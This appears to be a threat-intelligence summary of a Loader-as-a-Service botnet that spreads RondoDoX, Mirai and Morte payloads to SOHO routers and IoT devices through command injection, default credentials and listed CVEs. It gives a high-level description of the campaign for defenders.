Botnet Loader-as-a-Service Infrastructure Distributing RondoDoX and Mirai Payloads
Essential information
- Published
- 25/09/2025 23:21
- Modified
- 26/09/2025 11:56
- Tags
- 2025-09-25 CVE-2012-1823 CVE-2019-16759 CVE-2019-17574 botnet command injection cryptomining iot loader-as-a-service mirai morte rondodox soho routers
- Related entities
- 3 vulnerabilities (cve), 200 observables, 8 techniques (mitre), 3 malware, 2 others
Description
A sophisticated botnet operation employing a Loader-as-a-Service model was uncovered through exposed command and control logs spanning six months. The campaign systematically targets SOHO routers, IoT devices, and enterprise applications through command injection vulnerabilities in web interfaces. Key attack vectors include exploiting unsanitized POST parameters, leveraging default credentials, and targeting known CVEs in various systems. The operation showed a 230% attack spike from July-August 2025, deploying multi-architecture malware including Morte binaries and cryptomining payloads. With rapid infrastructure rotation and diverse malware, the threat is evolving rapidly, necessitating early detection and robust defense measures.